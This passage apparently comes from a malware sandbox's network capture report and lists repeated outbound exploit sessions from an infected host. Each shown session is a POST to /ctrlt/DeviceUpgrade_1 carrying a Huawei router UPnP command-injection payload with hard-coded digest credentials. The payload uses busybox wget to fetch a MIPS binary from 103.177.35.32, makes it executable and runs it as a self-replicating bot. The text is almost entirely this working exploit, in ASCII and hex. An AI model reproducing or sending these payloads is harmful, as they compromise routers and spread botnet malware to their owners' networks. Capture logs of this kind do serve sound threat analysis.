                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1400192.168.2.2360388157.232.254.21537215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.523610115 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1401192.168.2.234484641.76.54.24937215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.535984039 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1402192.168.2.234250241.199.152.11837215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.535988092 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1403192.168.2.234761641.102.205.20737215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.535996914 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1404192.168.2.2360014170.104.98.4637215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.535998106 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1405192.168.2.2349610157.218.61.18537215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.536009073 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1406192.168.2.2338460157.46.99.15737215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.536067009 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1407192.168.2.235533889.166.240.11937215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.536077023 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1408192.168.2.2351770199.179.79.9737215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.536079884 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1409192.168.2.235340441.44.10.837215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.536079884 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1410192.168.2.234152641.224.141.18437215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.536098957 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
